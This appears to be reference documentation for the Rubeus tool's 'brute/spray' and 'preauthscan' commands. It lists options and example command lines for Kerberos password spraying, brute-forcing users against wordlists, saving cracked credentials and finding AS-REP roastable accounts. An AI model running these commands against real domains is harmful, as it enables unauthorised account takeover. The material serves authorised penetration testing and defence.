brute / spray
Kerberos-based password brute-forcing or password spraying. Can also be invoked as spray.
Usage
Rubeus.exe brute </password:<password> | /passwords:<passwords-file>> [/user:<username> | /users:<users-file>] [/domain:<domain>] [/creduser:<domain>\<username> & /credpassword:<password>] [/ou:OU=...] [/dc:<dc-ip>] [/outfile:<output>] [/noticket] [/verbose] [/nowrap]
Options
/password:<password>β single password to test/passwords:<file>β file containing passwords, one per line/user:<username>β single user to test/users:<file>β file containing usernames, one per line/domain:<domain>β target domain (defaults to current)/dc:<dc-ip>β domain controller to target/creduser:<domain>\<username>β alternate LDAP credentials for user enumeration/credpassword:<password>β password for alternate credentials/ou:OU=...β restrict to specific OU/outfile:<output>β file to write successful credentials to/noticketβ don't display/save TGTs on success/verboseβ show all attempts including failures/nowrapβ don't line-wrap base64 output
Examples
# Spray a single password across all users in domain
Rubeus.exe brute /password:<password> /noticket
# Spray against a user list
Rubeus.exe brute /password:<password> /users:users.txt /domain:<domain> /dc:<dc-ip>
# Brute-force a specific user
Rubeus.exe brute /user:<username> /passwords:wordlist.txt /domain:<domain>
# With alternate creds for LDAP enumeration
Rubeus.exe brute /password:<password> /creduser:<domain>\<username> /credpassword:<password>
# Save successful creds
Rubeus.exe brute /password:<password> /outfile:<output>
preauthscan
Scan for accounts that do not require Kerberos pre-authentication (AS-REP roastable):
Rubeus.exe preauthscan /users:<users-file> [/domain:<domain>] [/dc:<dc-ip>] [/proxyurl:https://KDC_PROXY/kdcproxy]
# Example
Rubeus.exe preauthscan /users:users.txt /domain:<domain> /dc:<dc-ip>
Notes
- Blocked/disabled accounts are detected and skipped
- On success, a TGT is returned for the valid credential